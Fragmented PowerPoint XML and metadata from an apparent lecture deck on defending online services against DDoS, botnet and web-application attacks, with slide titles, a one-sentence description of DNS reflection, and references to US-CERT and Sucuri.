                                          <p:spTgt spid="5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25"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="56" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="273"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="58"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animBg="1"/>
      <p:bldP spid="524" grpId="1" animBg="1"/>
      <p:bldP spid="525" grpId="0" animBg="1"/>
      <p:bldP spid="5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Nineteen Attacks Exceeded 100 Gbps in Q1 2016</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507" t="7901" r="9861" b="48342"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="1464493"/>
            <a:ext cx="7446394" cy="536448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507" t="51377" r="9861" b="12959"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7670203" y="3213100"/>
            <a:ext cx="6729693" cy="4365383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="12344400" y="3543300"/>
            <a:ext cx="647700" cy="9906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5698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4294"/>
            <a:ext cx="10424160" cy="548640"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" strike="sngStrike" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10226041" y="2188283"/>
            <a:ext cx="3516430" cy="2462213"/>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rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS reflection attack:  The bulk of the traffic  was created by sending DNS requests with spoofed source addresses to open resolvers for domains that had enabled DNSSEC.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"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003" t="11395" r="25286" b="24999"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2207409" y="400833"/>
            <a:ext cx="6528034" cy="6964868"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3718372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Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8CCFDC8-7390-4064-9BFC-2AEE16C0501A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="24131" t="15924" r="25522" b="12048"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="939800" y="574674"/>
            <a:ext cx="9207500" cy="7080251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2942064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Amplification Rates of Various Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="1554480"/>
            <a:ext cx="13167360" cy="4827270"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://blog.sucuri.net/wp-content/uploads/2014/09/udp-amplif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504950"/>
            <a:ext cx="12774627"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5175" y="6430774"/>
            <a:ext cx="11820865" cy="892552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://www.us-cert.gov/ncas/alerts/TA14-017A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://blog.sucuri.net/2014/09/quick-analysis-of-a-ddos-attack-using-ssdp.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1112644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 Attack Frequency by Industry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3937B323-C765-4D70-A3E3-CFBE829D6741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="24479" t="40795" r="25915" b="24160"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="825759" y="1854200"/>
            <a:ext cx="11739177" cy="4457700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1754528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0 09 Sep 09 Pres-EVP 1-on-1">
  <a:themeElements>
    <a:clrScheme name="">
      <a:dk1>
        <a:srgbClr val="777777"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="777777"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="003366"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="093678"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FF8E11"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="656565"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="AAAEBE"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="E7800E"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="2B85BB"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="0936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txDef>
      <a:spPr>
        <a:noFill/>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr>
          <a:defRPr dirty="0" err="1" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>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FFFFFF"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="003366"/>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003366"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="093678"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="FF8E11"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>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
      <a:clrScheme name="Default Design 15">
        <a:dk1>
          <a:srgbClr val="292929"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="292929"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="003366"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="093678"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="FF8E11"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="212121"/>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FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="5F5F5F"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="003366"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="093678"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="FF8E11"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="505050"/>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 09 Sep 09 Pres-EVP 1-on-1</Template>
  <TotalTime>32087</TotalTime>
  <Words>1614</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>203</Paragraphs>
  <Slides>34</Slides>
  <Notes>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MS PGothic</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>2010 09 Sep 09 Pres-EVP 1-on-1</vt:lpstr>
      <vt:lpstr>Protecting On-Line Services from the Internet of Compromised Things</vt:lpstr>
      <vt:lpstr>Distributed Denial of Service (DDOS) Attacks</vt:lpstr>
      <vt:lpstr>Largest DDOS Attacks by Year</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nineteen Attacks Exceeded 100 Gbps in Q1 2016</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Amplification Rates of Various Attacks</vt:lpstr>
      <vt:lpstr>DDoS Attack Frequency by Industry</vt:lpstr>
      <vt:lpstr>Krebs Blog KrebsOnSecurity.com Comes Under Attack</vt:lpstr>
      <vt:lpstr>Default Passwords Hardcoded into Mirai BotNet Source</vt:lpstr>
      <vt:lpstr>memcached reflection attack on GitHub February 28, 2018</vt:lpstr>
      <vt:lpstr>Web Application Attacks</vt:lpstr>
      <vt:lpstr>Trend Towards Full-Site Delivery by CDNs</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Defeating HTTP flooding attacks – Rate Controls</vt:lpstr>
      <vt:lpstr>Quick Note on the Web Application Attack Data Corpus</vt:lpstr>
      <vt:lpstr>Top Web Application Attack Vectors</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Examples of Attacks “Scrubbed” by Akamai</vt:lpstr>
      <vt:lpstr>Structured Query Language (SQL)</vt:lpstr>
      <vt:lpstr>Example SQL Injection</vt:lpstr>
      <vt:lpstr>bobby-tables.com: A guide to preventing SQL injection</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS: Basic Cookie Stealing </vt:lpstr>
      <vt:lpstr>File Inclusion Attack</vt:lpstr>
      <vt:lpstr>File Inclusion Attack</vt:lpstr>
      <vt:lpstr>Cache Busting</vt:lpstr>
      <vt:lpstr>Malicious login attempts</vt:lpstr>
      <vt:lpstr>Bot-Based Account Takeover: Obtain Password Dump</vt:lpstr>
      <vt:lpstr>Leverage Compromised Home Cable Modems/Routers</vt:lpstr>
      <vt:lpstr>Account Takeover Campaign Attack Architecture</vt:lpstr>
      <vt:lpstr>Attacking IP Persistence: Finance Customer</vt:lpstr>
      <vt:lpstr>Observations</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Akamai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Summers, John</dc:creator>
  <cp:lastModifiedBy>Bruce Maggs</cp:lastModifiedBy>
  <cp:revision>406</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-09-07T16:08:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-13T21:13:16Z</dcterms:modified>
</cp:coreProperties>
</file>